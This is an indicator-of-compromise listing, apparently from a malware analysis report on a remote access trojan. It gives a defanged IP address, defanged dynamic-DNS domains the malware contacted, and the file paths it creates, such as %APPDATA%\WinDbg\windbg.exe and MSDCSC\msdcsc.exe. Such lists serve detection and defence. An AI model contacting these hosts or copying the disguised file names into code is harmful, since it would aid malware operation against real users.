IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
99[.]229[.]175[.]244 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
pervert[.]no-ip[.]info 7
pervert2[.]no-ip[.]info 7
delvega[.]no-ip[.]org 2
wp-enhanced[.]no-ip[.]org 2
funstuff712[.]zapto[.]org 2
fflazhhf1[.]no-ip[.]org 1
darkcometss[.]no-ip[.]org 1
not4umac[.]no-ip[.]biz 1
sanderkidah[.]no-ip[.]org 1
bobolobob[.]no-ip[.]biz 1
hg-ma[.]zapto5[.]org 1
corrosivegas2010[.]zapto[.]org 1
profi555[.]no-ip[.]org 1
hg-ma[.]zapto[.]org 1
jugoboy1[.]zapto[.]org 1
hg-ma[.]zapto1[.]org 1
hg-ma[.]zapto2[.]org 1
hg-ma[.]zapto3[.]org 1
hg-ma[.]zapto4[.]org 1
jackreapez[.]zapto[.]org 1
magicmq[.]no-ip[.]org 1
kenrickm[.]no-ip[.]org 1
mrganja[.]no-ip[.]org 1
cherubi[.]no-ip[.]org 1
Files and or directories created Occurrences
%APPDATA%\WinDbg 30
%APPDATA%\WinDbg\windbg.exe 29
%APPDATA%\dclogs 28
\svchost.exe 7
%TEMP%\uxcv9v 7
%TEMP%\uxcv9v.vbs 7
%HOMEPATH%\Documents\MSDCSC 6
%HOMEPATH%\Documents\MSDCSC\msdcsc.exe 6
%TEMP%\MSDCSC 5
%TEMP%\MSDCSC\msdcsc.exe 5
%SystemRoot%\SysWOW64\MSDCSC 3
%SystemRoot%\SysWOW64\MSDCSC\msdcsc.exe 3
%TEMP%\tMMjnM 1
%TEMP%\xMWbLz.vbs 1
%TEMP%\tMMjnM.vbs 1
%APPDATA%\WinDbg\msdnaa.exe 1
%TEMP%\Mi0z67 1
%HOMEPATH%\Documents\Explorer\Iexplorer.exe 1